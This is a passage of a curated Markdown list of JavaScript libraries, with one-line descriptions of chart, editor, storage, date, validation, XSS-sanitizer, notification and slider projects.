* [flot](https://github.com/flot/flot) - Attractive JavaScript charts for jQuery.
* [morris.js](https://github.com/morrisjs/morris.js) - Pretty time-series line graphs.
* [nvd3](https://github.com/novus/nvd3) - Build re-usable charts and chart components for d3.js.
* [svg.js](https://github.com/wout/svg.js) - A lightweight library for manipulating and animating SVG.
* [heatmap.js](https://github.com/pa7/heatmap.js) - JavaScript Library for HTML5 canvas based heatmaps.
* [jquery.sparkline](https://github.com/gwatts/jquery.sparkline) - A plugin for the jQuery JavaScript library to generate small sparkline charts directly in the browser.
* [trianglify](https://github.com/qrohlf/trianglify) - Low poly style background generator with d3.js.
* [d3-cloud](https://github.com/jasondavies/d3-cloud) - Create word clouds in JavaScript.
* [d4](https://github.com/heavysixer/d4) - A friendly reusable charts DSL for D3.
* [dimple.js](http://dimplejs.org) - Easy charts for business analytics powered by d3.
* [chartist-js](https://github.com/gionkunz/chartist-js) - Simple responsive charts.
* [epoch](https://github.com/epochjs/epoch) - A general purpose real-time charting library.
* [c3](https://github.com/c3js/c3) - D3-based reusable chart library.
* [BabylonJS](https://github.com/BabylonJS/Babylon.js) - A framework for building 3D games with HTML 5 and WebGL.
* [recharts](https://github.com/recharts/recharts) - Redefined chart library built with React and D3.
* [GraphicsJS](https://github.com/AnyChart/GraphicsJS) - A lightweight JavaScript graphics library with the intuitive API, based on SVG/VML technology.
* [mxGraph](https://github.com/jgraph/mxgraph) - Diagramming library that enables interactive graph and charting applications to be quickly created that run natively in any major browser that is supported by its vendor.
* [Frappe Charts](https://github.com/frappe/charts) - GitHub-inspired simple and modern SVG charts for the web with zero dependencies.
* [Frappe Gantt](https://github.com/frappe/gantt) - A simple, interactive, modern gantt chart library for the web.
* [G2](https://github.com/antvis/G2) - A highly interactive data-driven visualization grammar for statistical charts.
* [G2Plot](https://github.com/antvis/G2Plot) - An interactive and responsive charting library. Based on the grammar of graphics.
* [Cytoscape.js](https://github.com/cytoscape/cytoscape.js) - A fully featured graph theory library.
* [cola.js](https://ialab.it.monash.edu/webcola/) - library for arranging your HTML5 documents and diagrams using constraint-based optimization techniques
* [jointjs](https://github.com/clientIO/joint) - Diagramming library to create static diagrams or fully interactive diagramming tools.
* [vizzu](https://github.com/vizzuhq/vizzu-lib) - Library for animated data visualizations and data stories.
There're also some great commercial libraries, like [amchart](https://www.amcharts.com/), [anychart](https://www.anychart.com/), [plotly](https://plotly.com/), and [lightning chart](https://www.arction.com/lightningchart-js/).
## Timeline
* [TimelineJS v3](https://github.com/NUKnightLab/TimelineJS3) - A Storytelling Timeline built in JavaScript.
* [timesheet.js](https://github.com/sbstjn/timesheet.js) - JavaScript library for simple HTML5 & CSS3 time sheets.
## Spreadsheet
* [HANDSONTABLE](https://github.com/handsontable/handsontable) - Handsontable is a JavaScript/HTML5 Spreadsheet Library for Developers
* [Frappe Datatable](https://github.com/frappe/datatable) - Frappe DataTable is a simple, modern and interactive datatable library for displaying tabular data.
* [Luckysheet](https://github.com/mengshukeji/Luckysheet) - Luckysheet is an online spreadsheet like excel that is powerful, simple to configure, and completely open source.
* [Jspreadsheet CE](https://github.com/jspreadsheet/ce) - Jspreadsheet is a lightweight vanilla javascript plugin to create amazing web-based interactive tables and spreadsheets compatible with other spreadsheet software.
## Editors
* [ace](https://github.com/ajaxorg/ace) - Ace (Ajax.org Cloud9 Editor).
* [CodeMirror](https://github.com/codemirror/CodeMirror) - In-browser code editor.
* [esprima](https://github.com/ariya/esprima) - ECMAScript parsing infrastructure for multipurpose analysis.
* [quill](https://github.com/quilljs/quill) - A cross browser rich text editor with an API.
* [medium-editor](https://github.com/yabwe/medium-editor) - Medium.com WYSIWYG editor clone.
* [pen](https://github.com/sofish/pen) - enjoy live editing (+markdown).
* [jquery-notebook](https://github.com/raphaelcruzeiro/jquery-notebook) - A simple, clean and elegant text editor. Inspired by the awesomeness of Medium.
* [bootstrap-wysiwyg](https://github.com/mindmup/bootstrap-wysiwyg) - Tiny bootstrap-compatible WYSIWYG rich text editor.
* [ckeditor-releases](https://github.com/ckeditor/ckeditor-releases) - The best web text editor for everyone.
* [editor](https://github.com/lepture/editor) - A markdown editor. still on development.
* [EpicEditor](https://github.com/OscarGodson/EpicEditor) - An embeddable JavaScript Markdown editor with split fullscreen editing, live previewing, automatic draft saving, offline support, and more.
* [jsoneditor](https://github.com/josdejong/jsoneditor) - A web-based tool to view, edit and format JSON.
* [vim.js](https://github.com/coolwanglu/vim.js) - JavaScript port of Vim with a persistent `~/.vimrc`.
* [Squire](https://github.com/neilj/Squire) - HTML5 rich text editor.
* [TinyMCE](https://github.com/tinymce/tinymce) - The JavaScript Rich Text editor.
* [trix](https://github.com/basecamp/trix) - A rich text editor for everyday writing. By Basecamp.
* [Trumbowyg](https://github.com/Alex-D/Trumbowyg) - A lightweight and amazing WYSIWYG JavaScript editor.
* [Draft.js](https://github.com/facebook/draft-js) - A React framework for building text editors.
* [bootstrap-wysihtml5](https://github.com/jhollingworth/bootstrap-wysihtml5) - Simple, beautiful wysiwyg editor
* [wysihtml5](https://github.com/xing/wysihtml5) - Open source rich text editor based on HTML5 and the progressive-enhancement approach. Uses a sophisticated security concept and aims to generate fully valid HTML5 markup by preventing unmaintainable tag soups and inline styles.
* [raptor-editor](https://github.com/PANmedia/raptor-editor) - Raptor, an HTML5 WYSIWYG content editor!
* [popline](https://github.com/kenshin54/popline) - Popline is an HTML5 Rich-Text-Editor Toolbar.
* [Summernote](https://github.com/summernote/summernote) - Super simple WYSIWYG editor.
* [Everright-formEditor](https://github.com/Liberty-liu/Everright-formEditor) - A visual drag-and-drop low-code form editor
## Documentation
* [DevDocs](https://devdocs.io/) is an all-in-one API documentation reader with a fast, organized, and consistent interface.
* [docco](http://ashkenas.com/docco/) is a quick-and-dirty, hundred-line-long, literate-programming-style documentation generator.
* [styledocco](http://jacobrask.github.io/styledocco/) generates documentation and style guide documents from your stylesheets.
* [Ronn](https://github.com/rtomayko/ronn) builds manuals. It converts simple, human readable textfiles to roff for terminal display, and also to HTML for the web.
* [dox](https://github.com/tj/dox) is a JavaScript documentation generator written with node. Dox no longer generates an opinionated structure or style for your docs, it simply gives you a JSON representation, allowing you to use markdown and JSDoc-style tags.
* [jsdox](https://github.com/sutoiku/jsdox) is a JSDoc3 to Markdown documentation generator.
* [ESDoc](https://github.com/esdoc/esdoc) is a good documentation generator for JavaScript.
* [YUIDoc](http://yui.github.io/yuidoc/) is a Node.js application that generates API documentation from comments in source, using a syntax similar to tools like Javadoc and Doxygen.
* [coddoc](http://doug-martin.github.io/coddoc/) is a jsdoc parsing library. Coddoc is different in that it is easily extensible by allowing users to add tag and code parsers through the use of coddoc.addTagHandler and coddoc.addCodeHandler. coddoc also parses source code to be used in APIs.
* [sphinx](http://www.sphinx-doc.org/) a tool that makes it easy to create intelligent and beautiful documentation
* [Beautiful docs](https://github.com/beautiful-docs/beautiful-docs) is a documentation viewer based on markdown files.
* [documentation.js](http://documentation.js.org) - API documentation generator with support for ES2015+ and flow annotation.
* [jsduck](https://github.com/senchalabs/jsduck) - API documentation generator made for Sencha JavaScript frameworks, but can be used for other frameworks too.
* [codecrumbs](https://github.com/Bogdan-Lyashenko/codecrumbs) is a visual tool for learning and documenting a codebase by putting breadcrumbs in source code.
## Files
*Libraries for working with files.*
* [Papa Parse](https://github.com/mholt/PapaParse) - A powerful CSV library that supports parsing CSV files/strings and also exporting to CSV.
* [jBinary](https://github.com/jDataView/jBinary) - High-level I/O (loading, parsing, manipulating, serializing, saving) for binary files with declarative syntax for describing file types and data structures.
* [diff2html](https://github.com/rtfpessoa/diff2html) - Git diff output parser and pretty HTML generator.
* [jsPDF](https://github.com/MrRio/jsPDF) - JavaScript PDF generation.
* [PDF.js](https://github.com/mozilla/pdf.js) - PDF Reader in JavaScript.
## Functional Programming
*Functional programming libraries to extend JavaScript’s capabilities.*
* [underscore](https://github.com/jashkenas/underscore) - JavaScript's utility _ belt.
* [lodash](https://github.com/lodash/lodash) - A utility library delivering consistency, customization, performance, & extras.
* [Sugar](https://github.com/andrewplummer/Sugar) - A JavaScript library for working with native objects.
* [lazy.js](https://github.com/dtao/lazy.js) - Like Underscore, but lazier.
* [ramda](https://github.com/ramda/ramda) - A practical functional library for JavaScript programmers.
* [mout](https://github.com/mout/mout) - Modular JavaScript Utilities.
* [preludejs](https://github.com/alanrsoares/prelude-js) - Hardcore Functional Programming for JavaScript.
* [rambda](https://github.com/selfrefactor/rambda) - Faster and smaller alternative to *Ramda*.
* [fxts](https://github.com/marpple/FxTS) - Lazy evaluation and concurrency.
* [wild-wild-path](https://github.com/ehmicky/wild-wild-path) - Object property paths with wildcards and regexps.
## Reactive Programming
*Reactive programming libraries to extend JavaScript’s capabilities.*
* [RxJS](https://github.com/ReactiveX/rxjs) - A reactive programming library for JavaScript.
* [Bacon](https://github.com/baconjs/bacon.js) - FRP (functional reactive programming) library for JavaScript.
* [Kefir](https://github.com/pozadi/kefir) - FRP library for JavaScript inspired by Bacon.js and RxJS with focus on high performance and low memory consumption.
* [Highland](https://caolan.github.io/highland/) - Re-thinking the JavaScript utility belt, Highland manages synchronous and asynchronous code easily, using nothing more than standard JavaScript and Node-like Streams.
* [Most.js](https://github.com/cujojs/most) - high performance FRP library.
* [MobX](https://github.com/mobxjs/mobx) - TFRP library for simple, scalable state management.
* [Cycle.js](https://cycle.js.org) - A functional and reactive JavaScript library for cleaner code.
* [concent](https://github.com/concentjs/concent) - Definitely the ❤️ simplest but ⚡️ strongest state management for react, it is predictable、progressive and efficient.
## Data Structure
*Data structure libraries to build a more sophisticated application.*
* [immutable-js](https://github.com/facebook/immutable-js) - Immutable Data Collections including Sequence, Range, Repeat, Map, OrderedMap, Set and a sparse Vector.
* [mori](https://github.com/swannodette/mori) - A library for using ClojureScript's persistent data structures and supporting API from the comfort of vanilla JavaScript.
* [buckets](https://github.com/mauriciosantos/Buckets-JS) - A complete, fully tested and documented data structure library written in JavaScript.
* [hashmap](https://github.com/flesler/hashmap) - Simple hashmap implementation that supports any kind of keys.
* [ngraph.graph](https://github.com/anvaka/ngraph.graph) - Graph data structure in javascript.
* [js-sdsl](https://github.com/zly201/js-sdsl) - Refer to the javascript standard data structure library implemented by c++ stl, which supports c++ bidirectional iterator mode.
## Date
*Date Libraries.*
* [moment](https://github.com/moment/moment) - Parse, validate, manipulate, and display dates in JavaScript.
* [moment-timezone](https://github.com/moment/moment-timezone) - Timezone support for moment.js.
* [jquery-timeago](https://github.com/rmm5t/jquery-timeago) - A jQuery plugin that makes it easy to support automatically updating fuzzy timestamps (e.g. "4 minutes ago").
* [timezone-js](https://github.com/mde/timezone-js) - Timezone-enabled JavaScript Date object. Uses Olson zoneinfo files for timezone data.
* [date](https://github.com/MatthewMueller/date) - Date() for humans.
* [ms.js](https://github.com/rauchg/ms.js) - Tiny millisecond conversion utility.
* [countdown.js](https://github.com/gumroad/countdown.js) - Super simple countdowns.
* [timeago.js](https://github.com/hustcc/timeago.js) - Simple library (less then 2kb) used to format date with `*** time ago` statement.
* [fecha](https://github.com/taylorhakes/fecha) - Lightweight date formatting and parsing (~2KB). Meant to replace parsing and formatting functionality of moment.js.
* [date-fns](https://github.com/date-fns/date-fns) - Modern JavaScript date utility library.
* [map-countdown](https://github.com/dawidjaniga/map-countdown) - A browser countdown built on top of the Google Maps.
* [dayjs](https://github.com/iamkun/dayjs) - Day.js 2KB immutable date library alternative to Moment.js with the same modern API.
* [luxon](https://github.com/moment/luxon) - Luxon is a library for working with dates and times in JavaScript.
## String
*String Libraries.*
* [voca](https://github.com/panzerdp/voca) - The ultimate JavaScript string library
* [selecting](https://github.com/EvandroLG/selecting) - A library that allows you to access the text selected by the user.
* [underscore.string](https://github.com/epeli/underscore.string) - String manipulation extensions for Underscore.js JavaScript library.
* [string.js](https://github.com/jprichardson/string.js) - Extra JavaScript string methods.
* [he](https://github.com/mathiasbynens/he) - A robust HTML entity encoder/decoder written in JavaScript.
* [multiline](https://github.com/sindresorhus/multiline) - Multiline strings in JavaScript.
* [query-string](https://github.com/sindresorhus/query-string) - Parse and stringify URL query strings.
* [URI.js](https://github.com/medialize/URI.js/) - JavaScript URL mutation library.
* [jsurl](https://github.com/Mikhus/domurl) - Lightweight URL manipulation with JavaScript.
* [sprintf.js](https://github.com/alexei/sprintf.js) - A sprintf implementation.
* [url-pattern](https://github.com/snd/url-pattern) - Easier than regex string matching patterns for urls and other strings. Turn strings into data or data into strings.
* [plexis](https://github.com/plexis-js/plexis) - Lo-fi, powerful, community-driven string manipulation library.
* [url-state-machine](https://github.com/anonrig/url-js) - Super fast spec-compliant URL parser state machine for Node.js.
## Number
* [Numeral-js](https://github.com/adamwdraper/Numeral-js) - A JavaScript library for formatting and manipulating numbers.
* [chance.js](https://github.com/chancejs/chancejs) - Random generator helper in JavaScript. Can generate numbers, strings etc.
* [odometer](https://github.com/HubSpot/odometer) - Smoothly transitions numbers with ease.
* [accounting.js](https://github.com/josscrowcroft/accounting.js) - A lightweight JavaScript library for number, money and currency formatting - fully localisable, zero dependencies.
* [money.js](https://github.com/josscrowcroft/money.js) - A tiny (1kb) JavaScript currency conversion library, for web & nodeJS.
* [Fraction.js](https://github.com/infusion/Fraction.js) - A rational number library for JavaScript.
* [Complex.js](https://github.com/infusion/Complex.js) - A complex number library for JavaScript.
* [Polynomial.js](https://github.com/infusion/Polynomial.js) - A polynomials library for JavaScript.
* [Quaternion.js](https://github.com/infusion/Quaternion.js) - A quaternion library for JavaScript
## Storage
* [store.js](https://github.com/marcuswestin/store.js) - LocalStorage wrapper for all browsers without using cookies or flash. Uses localStorage, globalStorage, and userData behavior under the hood.
* [localForage](https://github.com/mozilla/localForage) - Offline storage, improved. Wraps IndexedDB, WebSQL, or localStorage using a simple but powerful API.
* [jStorage](https://github.com/andris9/jStorage) - jStorage is a simple key/value database to store data on browser side.
* [cross-storage](https://github.com/zendesk/cross-storage) - Cross domain local storage, with permissions.
* [basket.js](https://github.com/addyosmani/basket.js) - A script and resource loader for caching & loading scripts with localStorage.
* [bag.js](https://github.com/nodeca/bag.js) - A caching script and resource loader, similar to basket.js, but with additional k/v interface and localStorage / websql / indexedDB support.
* [basil.js](https://github.com/Wisembly/basil.js) - The missing JavaScript smart persistent layer.
* [jquery-cookie](https://github.com/carhartl/jquery-cookie) - A simple, lightweight jQuery plugin for reading, writing and deleting cookies.
* [js-cookie](https://github.com/js-cookie/js-cookie) - A simple, lightweight JavaScript API for handling browser cookies.
* [Cookies](https://github.com/ScottHamper/Cookies) - JavaScript Client-Side Cookie Manipulation Library.
* [DB.js](https://github.com/aaronpowell/db.js/) - Promise based IndexDB Wrapper library.
* [lawnchair.js](https://github.com/brianleroux/lawnchair/) - Simple client-side JSON storage.
* [sql.js](https://github.com/kripken/sql.js) - SQLite compiled to JavaScript through Emscripten.
* [pouchdb](https://github.com/pouchdb/pouchdb) - Javascript db inspired by Apache CouchDB to run well within the browser.
* [crumbsjs](https://github.com/nirtz89/crumbsjs) - A lightweight vanilla ES6 cookies and local storage JavaScript library.
* [awesome-web-storage](https://github.com/softvar/awesome-web-storage) - Everything you need to know about client-side storage.
* [datavore](https://github.com/StanfordHCI/datavore) - A small, fast, in-browser database engine written in JavaScript.
* [Hoodie](https://github.com/hoodiehq/hoodie) - Offline First backend to work in browser without internet connectivity.
* [NeDB](https://github.com/louischatriot/nedb) - Embedded Persistent database for Browsers, nw.js, electron.
* [Lovefield](https://google.github.io/lovefield) - Lovefield is a relational database for web apps, By Google.
* [Dexie.js](https://github.com/dexie/Dexie.js) - Dexie.js is a wrapper library for indexedDB.
* [proxy-web-storage](https://github.com/KID-joker/proxy-web-storage) - Keep the type of storage value unchanged and change array and object directly. Supports listening to the changes and setting expires.
## Color
* [randomColor](https://github.com/davidmerfield/randomColor) - A color generator for JavaScript.
* [chroma.js](https://github.com/gka/chroma.js) - JavaScript library for all kinds of color manipulations.
* [color](https://github.com/Qix-/color) - JavaScript color conversion and manipulation library.
* [colors](https://github.com/mrmrs/colors) - Smarter defaults for colors on the web.
* [PleaseJS](https://github.com/Fooidge/PleaseJS) - JavaScript Library for creating random pleasing colors and color schemes.
* [TinyColor](https://github.com/bgrins/TinyColor) - Fast, small color manipulation and conversion for JavaScript.
* [Vibrant.js](https://github.com/jariz/vibrant.js/) - Extract prominent colors from an image.
## I18n And L10n
*Localization (l10n) and internationalization (i18n) JavaScript libraries.*
* [i18next](https://github.com/i18next/i18next) - internationalisation (i18n) with JavaScript the easy way.
* [polyglot](https://github.com/airbnb/polyglot.js) - tiny i18n helper library.
* [babelfish](https://github.com/nodeca/babelfish/) - i18n with human friendly API and built in plurals support.
* [ttag](https://github.com/ttag-org/ttag) - Modern javascript i18n localization library based on ES6 tagged templates and the good old GNU gettext.
* [attranslate](https://github.com/fkirc/attranslate) - A JavaScript-tool for synchronizing translation-files, including JSON/YAML/XML and other formats.
## Control Flow
* [async](https://github.com/caolan/async) - Async utilities for node and the browser.
* [q](https://github.com/kriskowal/q) - A tool for making and composing asynchronous promises in JavaScript.
* [step](https://github.com/creationix/step/) - An async control-flow library that makes stepping through logic easy.
* [contra](https://github.com/bevacqua/contra/) - Asynchronous flow control with a functional taste to it.
* [Bluebird](https://github.com/petkaantonov/bluebird/) - fully featured promise library with focus on innovative features and performance.
* [when](https://github.com/cujojs/when) - A solid, fast Promises/A+ and when() implementation, plus other async goodies.
* [ObjectEventTarget](https://github.com/gartz/ObjectEventTarget) - Provide a prototype that add support to event listeners (with same behavior of EventTarget from DOMElements available on browsers).
* [sporadic](https://github.com/marcoonroad/sporadic) - Composable concurrency abstractions (such as streams, coroutines and Go-like channels) on top of promises, for Node and browser engines.
## Routing
* [director](https://github.com/flatiron/director) - A tiny and isomorphic URL router for JavaScript.
* [page.js](https://github.com/visionmedia/page.js) - Micro client-side router inspired by the Express router (~1200 bytes).
* [pathjs](https://github.com/mtrpcic/pathjs) - Simple, lightweight routing for web browsers.
* [crossroads](https://github.com/millermedeiros/crossroads.js) - JavaScript Routes.
* [davis.js](https://github.com/olivernn/davis.js) - RESTful degradable JavaScript routing using pushState.
* [navaid](https://github.com/lukeed/navaid) - A navigation aid (aka, router) for the browser in 850 bytes~!
## Security
* [DOMPurify](https://github.com/cure53/DOMPurify) - A DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG.
* [js-xss](https://github.com/leizongmin/js-xss) - Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist.
* [xss-filters](https://github.com/yahoo/xss-filters) - Secure XSS Filters by Yahoo.
* [sanitize-html](https://github.com/apostrophecms/sanitize-html) - sanitize-html provides a simple HTML sanitizer with a clear API.
## Log
* [log](https://github.com/adamschwartz/log) - Console.log with style.
* [Conzole](https://github.com/Oaxoa/Conzole) - A debug panel built in JavaScript that wraps JavaScript native console object methods and functionality in a panel displayed inside the page.
* [console.log-wrapper](https://github.com/patik/console.log-wrapper) - Log to the console in any browser with clarity.
* [loglevel](https://github.com/pimterry/loglevel) - Minimal lightweight logging for JavaScript, adding reliable log level methods to wrap any available console.log methods.
* [minilog](http://mixu.net/minilog/) – Lightweight client & server-side logging with Stream-API backends.
* [storyboard](http://guigrpa.github.io/storyboard/) - Universal logging library + Chrome extension; it lets you see all client and server tasks triggered by a user action in a single place.
## RegExp
* [RegEx101](https://regex101.com/#javascript) - Online regex tester and debugger for JavaScript. Also supports Python, PHP and PCRE.
* [RegExr](https://regexr.com/) - HTML/JS based tool for creating, testing, and learning about Regular Expressions.
## Voice Command
* [annyang](https://github.com/TalAter/annyang) - A JavaScript library for adding voice commands to your site, using speech recognition.
* [voix.js](https://github.com/pazguille/voix) - A JavaScript library to add voice commands to your sites, apps or games.
## API
* [axios](https://github.com/axios/axios) - Promise based HTTP client for the browser and node.js.
* [bottleneck](https://github.com/SGrondin/bottleneck) - A powerful rate limiter that makes throttling easy.
* [oauth-signature-js](https://github.com/bettiolo/oauth-signature-js) - JavaScript OAuth 1.0a signature generator for node and the browser.
* [amygdala](https://github.com/lincolnloop/amygdala) - RESTful HTTP client for JavaScript powered web applications.
* [jquery.rest](https://github.com/jpillora/jquery.rest) - A jQuery plugin for easy consumption of RESTful APIs.
* [Rails Ranger](https://github.com/victor-am/rails-ranger) - An opinionated REST client for Ruby on Rails APIs.
* [wretch](https://github.com/elbywan/wretch) - A tiny wrapper built around fetch with an intuitive syntax.
* [Bearer.sh](https://github.com/Bearer/bearer-js) - Universal API client that supports OAuth / API Key / Basic / etc.
* [FarFetch](https://github.com/WebsiteBeaver/far-fetch) - Modern Fetch API wrapper for simplicity, with concise file uploading.
* [Optic](https://github.com/opticdev/optic) - Optic automatically documents and tests your APIs.
* [SWR](https://github.com/vercel/swr) - React Hooks library for remote data fetching.
* [React Query](https://github.com/tannerlinsley/react-query) - Hooks for fetching, caching and updating asynchronous data in React.
* [SWRV](https://github.com/Kong/swrv) - Stale-while-revalidate data fetching for Vue.
* [Vue Query](https://github.com/DamianOsipiuk/vue-query) - Hooks for fetching, caching and updating asynchronous data in Vue.
## Streaming
* [Tailor](https://github.com/zalando/tailor) - Streaming layout service for front-end microservices, inspired by Facebook's BigPipe.
## Vision Detection
* [tracking.js](https://github.com/eduardolundgren/tracking.js) - A modern approach for Computer Vision on the web.
* [ocrad.js](https://github.com/antimatter15/ocrad.js) - OCR in JavaScript via Emscripten.
## Machine Learning
* [ConvNetJS](https://github.com/karpathy/convnetjs) - Deep Learning in JavaScript. Train Convolutional Neural Networks (or ordinary ones) in your browser.
* [DN2A](https://github.com/dn2a/dn2a-javascript) - Digital Neural Networks Architecture.
* [Brain.js](https://github.com/harthur/brain) - Neural networks in JavaScript.
* [Mind.js](https://github.com/stevenmiller888/mind) - A flexible neural network library.
* [Synaptic.js](https://github.com/cazala/synaptic) - Architecture-free neural network library for node.js and the browser.
* [TensorFlow.js](https://www.tensorflow.org/js/) - A JavaScript library for training and deploying ML models in the browser and on Node.js.
* [ml5.js](https://ml5js.org) - Friendly Machine Learning for the Web.
* [Synapses](https://github.com/mrdimosthenis/Synapses) - Lightweight cross-platform Neural Network library.
* [m2cgen](https://github.com/BayesWitnesses/m2cgen) - A CLI tool to transpile trained classic ML models into a native JavaScript code with zero dependencies.
## Browser Detection
* [bowser](https://github.com/ded/bowser) - a browser detector.
## Operating System
* [os.js](https://github.com/os-js/OS.js) - An open-source web desktop platform with a window manager, application APIs, GUI toolkit, filesystem abstractions and much more.
## Benchmark
* [benchmark.js](https://github.com/bestiejs/benchmark.js) - A benchmarking library. As used on jsPerf.com.
* [matcha](https://github.com/logicalparadox/matcha) - A caffeine driven, simplistic approach to benchmarking.
## Web Worker
* [partytown](https://github.com/BuilderIO/partytown) - Relocate resource intensive third-party scripts off of the main thread and into a web worker.
* [comlink](https://github.com/GoogleChromeLabs/comlink) - Comlink is a tiny library (1.1kB), that removes the mental barrier of thinking about postMessage and hides the fact that you are working with workers.
* [greenlet](https://github.com/developit/greenlet) - Move an async function into its own thread.
* [workerize](https://github.com/developit/workerize) - Moves a module into a Web Worker, automatically reflecting exported functions as asynchronous proxies.
* [worker-dom](https://github.com/ampproject/worker-dom) - An in-progress implementation of the DOM API intended to run within a Web Worker.
* [threads.js](https://github.com/andywer/threads.js) - Offload CPU-intensive tasks to worker threads in node.js, web browsers and electron using one uniform API.
* [workly](https://github.com/pshihn/workly) - A really simple way to move a function or class to a web worker.
* [stockroom](https://github.com/developit/stockroom) - Offload your store management to a worker easily.
* [workerpool](https://github.com/josdejong/workerpool) - Offload tasks to a pool of workers on node.js and in the browser.
* [clooney](https://github.com/GoogleChromeLabs/clooney) - Clooney is an actor library for the web. Use workers without thinking about workers.
## Code highlighting
* [Highlight.js](https://github.com/isagalaev/highlight.js) - JavaScript syntax highlighter.
* [PrismJS](https://github.com/PrismJS/prism) - Lightweight, robust, elegant syntax highlighting.
## Loading Status
*Libraries for indicate load status.*
* [Mprogress.js](https://github.com/lightningtgc/MProgress.js) - Create Google Material Design progress linear bars.
* [NProgress](https://ricostacruz.com/nprogress/) - Slim progress bars for Ajax'y applications.
* [Spin.js](https://github.com/fgnass/spin.js) - A spinning activity indicator.
* [progress.js](https://github.com/usablica/progress.js) - Create and manage progress bar for every objects on the page.
* [progressbar.js](https://github.com/kimmobrunfeldt/progressbar.js) - Beautiful and responsive progress bars with animated SVG paths.
* [pace](https://github.com/HubSpot/pace) - Automatically add a progress bar to your site.
* [topbar](https://github.com/buunguyen/topbar) - Tiny & beautiful site-wide progress indicator.
* [nanobar](https://github.com/jacoborus/nanobar) - Very lightweight progress bars. No jQuery.
* [PageLoadingEffects](https://github.com/codrops/PageLoadingEffects) - Modern ways of revealing new content using SVG animations.
* [SpinKit](https://github.com/tobiasahlin/SpinKit) - A collection of loading indicators animated with CSS.
* [Ladda](https://github.com/hakimel/Ladda) - Buttons with built-in loading indicators.
* [css-loaders](https://github.com/lukehaas/css-loaders) - A collection of loading spinners animated with CSS
## Validation
* [Parsley.js](https://github.com/guillaumepotier/Parsley.js) - Validate your forms, frontend, without writing a single line of JavaScript.
* [jquery-validation](https://github.com/jzaefferer/jquery-validation) - jQuery Validation Plugin.
* [validator.js](https://github.com/chriso/validator.js) - String validation and sanitization.
* [validate.js](https://github.com/rickharrison/validate.js) - Lightweight JavaScript form validation library inspired by CodeIgniter.
* [validatr](https://github.com/jaymorrow/validatr/) - Cross Browser HTML5 Form Validation.
* [FormValidation](https://formvalidation.io/) - The best jQuery plugin to validate form fields. Formerly BootstrapValidator.
* [is.js](https://github.com/arasatasaygin/is.js) - Check types, regexps, presence, time and more.
* [FieldVal](https://github.com/FieldVal/fieldval-js) - multipurpose validation library. Supports both sync and async validation.
* [Funval](https://github.com/neuledge/funval) - Data validation using functions interfaces (support TypeScript).
* [vest](https://github.com/ealush/vest) - 🦺 Declarative form validation framework inspired by unit testing.
## Keyboard Wrappers
* [mousetrap](https://github.com/ccampbell/mousetrap) - Simple library for handling keyboard shortcuts in JavaScript.
* [keymaster](https://github.com/madrobby/keymaster) - A simple micro-library for defining and dispatching keyboard shortcuts.
* [Keypress](https://github.com/dmauro/Keypress) - A keyboard input capturing utility in which any key can be a modifier key.
* [KeyboardJS](https://github.com/RobertWHurst/KeyboardJS) - A JavaScript library for binding keyboard combos without the pain of key codes and key combo conflicts.
* [jquery.hotkeys](https://github.com/jeresig/jquery.hotkeys) - jQuery Hotkeys lets you watch for keyboard events anywhere in your code supporting almost any key combination.
* [jwerty](https://github.com/keithamus/jwerty) - Awesome handling of keyboard events.
## Tours And Guides
* [intro.js](https://github.com/usablica/intro.js) - A better way for new feature introduction and step-by-step users guide for your website and project.
* [shepherd](https://github.com/HubSpot/shepherd) - Guide your users through a tour of your app.
* [bootstrap-tour](https://github.com/sorich87/bootstrap-tour) - Quick and easy product tours with Twitter Bootstrap Popovers.
* [tourist](https://github.com/easelinc/tourist) - Simple, flexible tours for your app.
* [hopscotch](https://github.com/linkedin/hopscotch) - A framework to make it easy for developers to add product tours to their pages.
* [joyride](https://github.com/zurb/joyride) - jQuery feature tour plugin.
* [focusable](https://github.com/zzarcon/focusable) - Set a spotlight focus on DOM element adding a overlay layer to the rest of the page.
* [driver.js](https://github.com/kamranahmedse/driver.js) - Powerful yet light-weight, vanilla JavaScript engine to drive the user's focus across the page
## Notifications
* [iziToast](https://github.com/dolce/iziToast) - Elegant, responsive, flexible and lightweight notification plugin with no dependencies.
* [messenger](https://github.com/HubSpot/messenger) - Growl-style alerts and messages for your app.
* [noty](https://github.com/needim/noty) - jQuery notification plugin.
* [pnotify](https://github.com/sciactive/pnotify) - JavaScript notifications for Bootstrap, jQuery UI, and the Web Notifications Draft.
* [toastr](https://github.com/CodeSeven/toastr) - Simple JavaScript toast notifications.
* [humane-js](https://github.com/wavded/humane-js) - A simple, modern, browser notification system.
* [smoke.js](https://github.com/hxgf/smoke.js) - Framework-agnostic styled alert system for JavaScript.
* [notie](https://github.com/jaredreich/notie) - Simple notifications and inputs with no dependencies.
* [notifire](https://github.com/notifirehq/notifire) - Open-source notification infrastructure for products.
* [toastify-js](https://github.com/apvarun/toastify-js) - Pure JavaScript library for better notification messages.
## Sliders
* [Swiper](https://github.com/nolimits4web/Swiper) - Mobile touch slider and framework with hardware accelerated transitions.
* [slick](https://github.com/kenwheeler/slick) - The last carousel you'll ever need.
* [slidesJs](http://www.slidesjs.com) - Is a responsive slideshow plug-in for JQuery(1.7.1+) with features like touch and CSS3 transitions
* [FlexSlider](https://github.com/woothemes/FlexSlider) - An awesome, fully responsive jQuery slider plugin.
* [sly](https://github.com/darsain/sly) - JavaScript library for one-directional scrolling with item based navigation support.
* [vegas](https://github.com/jaysalvat/vegas) - A jQuery plugin to add beautiful fullscreen backgrounds to your webpages. It even allows Slideshows.
* [Sequence](https://github.com/IanLunn/Sequence) - CSS animation framework for creating responsive sliders, presentations, banners, and other step-based applications.
* [reveal.js](https://github.com/hakimel/reveal.js) - A framework for easily creating beautiful presentations using HTML.
* [impress.js](https://github.com/impress/impress.js) - It's a presentation framework based on the power of CSS3 transforms and transitions in modern browsers and inspired by the idea behind prezi.com.
* [bespoke.js](https://github.com/bespokejs/bespoke) - DIY Presentation Micro-Framework
* [Strut](https://github.com/tantaman/Strut) - Strut - An Impress.js and Bespoke.js Presentation Editor
* [PhotoSwipe](https://github.com/dimsemenov/PhotoSwipe) - JavaScript image gallery for mobile and desktop, modular, framework independent.
* [jcSlider](https://github.com/JoanClaret/jcSlider) - A responsive slider jQuery plugin with CSS animations.
* [basic-jquery-slider](https://github.com/jcobb/basic-jquery-slider) - Simple to use, simple to theme, simple to customise.
* [jQuery.adaptive-slider](https://github.com/creative-punch/jQuery.adaptive-slider/) - A jQuery plugin for a slider with adaptive colored figcaption and navigation.
